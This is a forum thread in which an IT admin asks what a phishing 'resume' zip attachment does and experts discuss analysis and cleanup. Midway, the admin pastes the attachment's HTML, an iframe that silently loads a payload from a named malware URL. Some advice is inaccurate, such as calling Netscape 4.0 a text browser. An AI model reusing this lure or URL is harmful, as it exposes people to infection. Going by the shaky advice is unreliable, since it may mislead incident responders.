got the myresume.zip email - what does it do?

several users have got this email and clicked on it.  Can someone tell me what the payload is? I have scanned with several virus malware scanners and i don't see anything it is doing. I know for a face the file has a db file in it.  Thanks!
Just want to make sure it is clean.
bbimisAsked:
Who is Participating?

[Product update] Infrastructure Analysis Tool is now available with Business Accounts.Learn More

x
I wear a lot of hats...

"The solutions and answers provided on Experts Exchange have been extremely helpful to me over the last few years. I wear a lot of hats - Developer, Database Administrator, Help Desk, etc., so I know a lot of things but not a lot about one thing. Experts Exchange gives me answers from people who do know a lot about one thing, in a easy to use platform." -Todd S.

*** Hopeleonie ***IT ManagerCommented:
Upload it to https://www.virustotal.com/ and post the result here.
cwstad2Commented:
There are a lot of documented evidence rgarding this kind of potential attack, usually a trojan. Is there any content to the mail?

You can also submit to symantec

https://submit.symantec.com/websubmit/retail.cgi

or as above

https://www.virustotal.com/uk/
Cloud as a Security Delivery Platform for MSSPs

Every Managed Security Service Provider (MSSP) needs a platform to deliver effective and efficient security-as-a-service to their customers. Scale, elasticity and profitability are a few of the many features that a Cloud platform offers. View our on-demand webinar to learn more!

cwstad2Commented:
i would be very careful does it have content similar to this

    " My name is Bobbie Rocha, attached is my resume.

    I look forward to hearing back from you.

     Thank you,

    Bobbie"

"Subject: My resume

Attached is my resume, let me know if its ok.

Thanks,
Ignacio Oakes

   Resume_LinkedIn.zip (14)"

"Subject: FW: Resume

Attached is my resume, let me know if its ok.

Thanks,
Derick Baldwin

   Resume.zip (11)"
*** Hopeleonie ***IT ManagerCommented:
Zip the whole Mail with attachment and upload it to:
http://www.filedropper.com/ after post it for me.

I will analyze it for you. Symantec will take some days to respond. :-)
bbimisAuthor Commented:
i can't send to filedropper
*** Hopeleonie ***IT ManagerCommented:
You can't upload to filedropper ?
Then try http://www.speedyshare.com/
Gabriel CliftonNet AdminCommented:
One thing you can do which is good for personal learning is build you a virtual machine with a good A/V and malware programs, copy the file to the VM, disconnect from network (completely isolated) and open it watching what it does. Do some file and registry comparisons before and after.
Ess KayEntrapenuerCommented:
right click the file, extract it to a temp folder,

Open it in NOTEPAD ONLY
bbimisAuthor Commented:
here is what it contains


resume3588.html
and contents
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta name="keywords"
        content="project">

  <meta name="description"
        content="my description">
</head>
<body>
<iframe src="http://newmediava.com/wp-content/plugins/project.php?id=357"  width="829" height="351" align="top"></iframe>

Open in new window

</body>
</html>
Michael-BestCommented:
If it is not from someone you know and trust then suspect that is unsafe.
Never open unknown emails with attachments.

Read:
"Email scam warning: "My resume"
 https://help.fredhealth.com.au/blogs/fredofficealerts/archive/2015/03/30/email-scam-warning-quot-my-resume-quot-cryptolocker-style-attack.aspx
Ess KayEntrapenuerCommented:
the link takes you to a website run on WordPress with an unknown plugin.

could be cross site scripting.

here is the whois on the owner:
http://whois.domaintools.com/newmediava.com

if you really want to see whats on it,  download a text based brownswer like Netscape 4.0 and open it.

no scripts will run,  but your ip and link will be logged.

I don't recommend that you EVER open zip files  from people you don't know,  if you are not security professional.  If you are expecting resumes,  The best option is to have a website where they will fill in fields.

Or to ask that they put the text of the resume into thea body of the email.


Remember,  Microsoft files can contain malicious scripts as macros,  so can ave,  mpeg, mp4 doc,  docx,  exl,...  etc

rule of thumb is,  if its not warranted mail,  its spam
*** Hopeleonie ***IT ManagerCommented:
I analysed your file in our Lab:
FW ReMy resume.msg/resume3688.html is Malware.

Info about the Malware:
It is a script-virus that is able to infect the system using a HTML script.
*** Hopeleonie ***IT ManagerCommented:
@Gabriel Clifton
One thing you can do which is good for personal learning is build you a virtual machine with a good A/V and malware programs, copy the file to the VM, disconnect from network (completely isolated) and open it watching what it does. Do some file and registry comparisons before and after.

Bad idea! Will not work for most modern Malware :-)
bbimisAuthor Commented:
hopeloeonie,
any idea what registry files or anything it writes so I can clean the system(s) it has been ran on? I currently use the following methods:
jrt
combofix
adwcleaner
super anti spyware
malware bytes rootkit
spyhunter

Thanks! just wanted to protect my end users.
*** Hopeleonie ***IT ManagerCommented:
You ran all of them?
bbimisAuthor Commented:
yes but didn't see anything related to the myresume.zip and it didn't even delete the file I had saved so I assume it didn't detect it. if there are any registry entries made as the payload please let me know and I can clear them.  Thanks!
*** Hopeleonie ***IT ManagerCommented:
Bad :-) . Did any scan find anything?

Just runnings many scans one after another is not proper Malware removal. Note also proper Malware removal will need a lot of time, so your patient’s is asked. As this is a corporate environment I strongly recommend to reimage or reinstall your clients as nobody can give 100% guarantee that all Malware is removed.

And never run Combofix, if this is not told by a Combofix Expert :-)
Ess KayEntrapenuerCommented:
it wont delete the file because the file is not a virus.

its simply a local webpage with an iframe to malware,  

when you open it just opens the webpage,  (which contains the malware)

the file itself doesn't contain anything harmful,  just a link
Ess KayEntrapenuerCommented:
read your own post where you posted the unzipped file


 html.... <iframe src=www.malwarewebsite.com/WordPress/malwareplugin>...

Experts Exchange Solution brought to you by

Your issues matter to us.

Facing a tech roadblock? Get the help and guidance you need from experienced professionals who care. Ask your question anytime, anywhere, with no hassle.

Start your 7-day free trial
bbimisAuthor Commented:
thanks!
It's more than this solution.Get answers and train to solve all your tech problems - anytime, anywhere.Try it for free Edge Out The Competitionfor your dream job with proven skills and certifications.Get started today Stand Outas the employee with proven skills.Start learning today for free Move Your Career Forwardwith certification training in the latest technologies.Start your trial today
Anti-Spyware

From novice to tech pro — start learning today.